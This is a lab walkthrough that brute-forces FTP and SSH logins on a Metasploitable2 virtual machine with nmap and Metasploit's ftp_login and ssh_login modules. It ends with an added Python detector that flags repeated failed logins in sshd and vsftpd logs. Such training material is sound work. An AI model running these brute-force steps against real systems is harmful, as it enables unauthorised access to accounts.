🧪 LAB OVERVIEW
This lab demonstrates how to perform brute force attacks on FTP and SSH services using Metasploit Framework (msfconsole). The target machine is Metasploitable2, and the attacker machine is Kali Linux.
🖥️ Machines Used
Role      Operating System   Tools Used
Attacker  Kali Linux         Metasploit (msfconsole)
Target    Metasploitable 2   FTP (vsftpd), SSH (OpenSSH)
🌐 1. Network Setup
✅ Environment: VirtualBox or VMware
- Set both machines to Host-Only Adapter or NAT Network.
- Ensure both machines are on the same subnet.
- Confirm connectivity using ping.
🖥️ On Kali Linux:
ping 192.168.142.130
🖥️ On Metasploitable2:
ping 192.168.142.128
🔍 2. Scan the Target Machine (Metasploitable2)
Use Nmap to discover open services:
nmap -sS -sV 192.168.142.130
You should see:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian
🚪 3. Brute Force FTP (Port 21)
🛠️ Step-by-Step:
📁 Prepare user and password files:
nano /home/kali/custom_users.txt
# Example content:
msfadmin
nano /home/kali/custom_pass.txt
🚀 Launch Metasploit:
msfconsole
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.168.142.130
set USER_FILE /home/kali/custom_users.txt
set PASS_FILE /home/kali/custom_pass.txt
set THREADS 10
run
Output: msfadmin:msfadmin
🔐 4. Brute Force SSH (Port 22)
🛠️ Step-by-Step:
🚀 Launch Metasploit:
msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.142.130
set USER_FILE /home/kali/custom_users.txt
set PASS_FILE /home/kali/custom_pass.txt
set THREADS 10
set VERBOSE true
set STOP_ON_SUCCESS true
run
🧾 Conclusion
In this lab, we successfully simulated brute force attacks on FTP and SSH services of a vulnerable target (Metasploitable2) using Metasploit Framework. The results revealed weak credentials (msfadmin:msfadmin) that allowed unauthorized access.
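The defender's view of the same activity, as an added example that is not part of the original lab: the sketch below parses sshd and vsftpd log lines and flags any source with repeated failed logins, recording the account when a success follows the failures. The log lines are constructed samples that reuse the lab's addresses; the function name detect_bruteforce and the threshold of 3 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines (not captured from the lab) in sshd and vsftpd log formats.
SAMPLE_LOG = '''\
Jan 10 10:00:01 metasploitable sshd[4101]: Failed password for root from 192.168.142.128 port 40122 ssh2
Jan 10 10:00:01 metasploitable sshd[4102]: Failed password for invalid user admin from 192.168.142.128 port 40123 ssh2
Jan 10 10:00:02 metasploitable sshd[4103]: Failed password for msfadmin from 192.168.142.128 port 40124 ssh2
Jan 10 10:00:02 metasploitable sshd[4104]: Accepted password for msfadmin from 192.168.142.128 port 40125 ssh2
Jan 10 10:05:00 metasploitable sshd[4200]: Failed password for msfadmin from 192.168.142.1 port 51000 ssh2
Jan 10 10:05:09 metasploitable sshd[4201]: Accepted password for msfadmin from 192.168.142.1 port 51001 ssh2
Wed Jan 10 10:10:01 2024 [pid 5001] [user] FAIL LOGIN: Client "192.168.142.128"
Wed Jan 10 10:10:01 2024 [pid 5002] [admin] FAIL LOGIN: Client "192.168.142.128"
Wed Jan 10 10:10:02 2024 [pid 5003] [msfadmin] FAIL LOGIN: Client "192.168.142.128"
Wed Jan 10 10:10:02 2024 [pid 5004] [msfadmin] OK LOGIN: Client "192.168.142.128"
'''

SSH_RE = re.compile(r"sshd\[\d+\]: (?P<res>Failed|Accepted) password for "
                    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
FTP_RE = re.compile(r'\[pid \d+\] \[(?P<user>[^\]]+)\] (?P<res>FAIL|OK) LOGIN: '
                    r'Client "(?P<ip>[^"]+)"')

def detect_bruteforce(log_text, threshold=3):
    """Alert on each (service, source IP) with at least `threshold` failed logins;
    success_as names the account if a successful login followed those failures."""
    failures = defaultdict(int)
    users = defaultdict(set)
    success = {}
    for line in log_text.splitlines():
        for service, rx in (("ssh", SSH_RE), ("ftp", FTP_RE)):
            m = rx.search(line)
            if not m:
                continue
            key = (service, m["ip"])
            if m["res"] in ("Failed", "FAIL"):
                failures[key] += 1
                users[key].add(m["user"])
            elif failures[key] >= threshold:
                # A success after a burst of failures is the high-priority case.
                success.setdefault(key, m["user"])
    return [{"service": s, "source": ip, "failures": n,
             "users_tried": sorted(users[(s, ip)]),
             "success_as": success.get((s, ip))}
            for (s, ip), n in sorted(failures.items()) if n >= threshold]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The single mistyped password from 192.168.142.1 stays below the threshold and raises no alert, while both bursts from the Kali address are reported with the account that was eventually logged in.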